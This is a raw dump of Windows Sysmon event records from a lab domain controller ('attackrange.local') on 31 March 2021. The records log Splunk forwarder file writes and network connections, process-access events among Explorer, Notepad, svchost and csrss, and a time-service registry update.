Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53713-false10.0.1.12-8000- 23542300x800000000000000010925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:39.721{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68BFCE31BDABDF2DDAA43DD739855404,SHA256=036A83FDF1D5C18FADF2351351ED9D96120FB857E7FB37B3D6506FFC858B3919,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.736{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DB2325A58A4808B771FF74D37395427,SHA256=641768433B5760CE0F5F6009441EBCC5569C2ED364E6FD41FA3D45C3062659B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:41.736{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC7A4C02C5A12C54B206A2155743120,SHA256=DCFC7E5C46835CDCF020A756DFC9BA3680B9D292A9B5708902D038C0406647CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.752{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76B2E2BBF49690A4FB5CA2CE2867F7A,SHA256=B20501B13F0D351A7E439C9F521D83B14634DA3F34C7746D1C64A81B014D3765,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.471{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.846{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18A87A5362D997EE55E762C1582D8B7B,SHA256=CBD41A5802A3C709C870463F8A48A52BB01A221F3D847E4DA9E141D6D60BC07D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.642{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C6A64E182A6A6EBC148FBF36D0EBCEA,SHA256=262B7B272B7753061660CBF43ABEAE30D9A375E85F793E41F4EEB5E7A2A0B34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.642{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=787613594085E9168DAD20C0527D30C9,SHA256=097ADBA32BAAB0BB3C9A0EE45079390FE94C71485C28303B5C30C849982789AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.475{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53714-false10.0.1.12-8000- 23542300x800000000000000010943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:44.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD1C60859D9088CBD340712D0062858,SHA256=D39B0E2682244C41684FB10BFEC849A9CE8A4FF1AF1C379E6B44E95DCFF4ABF6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:44.470{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x800000000000000010941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:44.470{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=908D703F7E0A572AE68923E1192BEDAA,SHA256=C010587A3AA11847CA6C3367FAE119459A8356715EB32BDB03B689D3CFB2AAEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:45.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CACA0E0D96C8DBBBA70C88B9D3C67C55,SHA256=075D2893B312CA6AF0707811F46487B5B4F71E54BDBDB6B58712F72D39EAE6E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:46.970{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EAC3B351F67570C15CF80718A6331C,SHA256=808192FAC6E7E547E8723CB5310083D6D0A807E0F90C4A1C29FE2E7CB452F3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:48.939{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:47.584{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53715-false10.0.1.12-8000- 23542300x800000000000000010946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:48.095{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1C9D507699378758DFEB44F0A76088,SHA256=7A1D6EADF8705BD106FC6463E2298A61D9EF44D69D244E9A747F9E1741C9867F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.595{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.111{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D6F0BF5B10D188374A65B84FB59F127,SHA256=20A0C136525B99C586942B9EE3C38CDC51F8AFFE12636E19EF9445B70EC2CB76,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:49.017{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xbf43106d) 354300x800000000000000010959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.334{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53716-false10.0.1.12-8089- 23542300x800000000000000010958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:50.173{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=058A0132EA8D51FAA4D24E84E26B9CDD,SHA256=47DE51DAA200A1D6467D3DAA147DD43E7B0351FD8D4A54A477891B89623598CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.251{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-668F-6064-7401-00000000AE01}1340C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.235{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 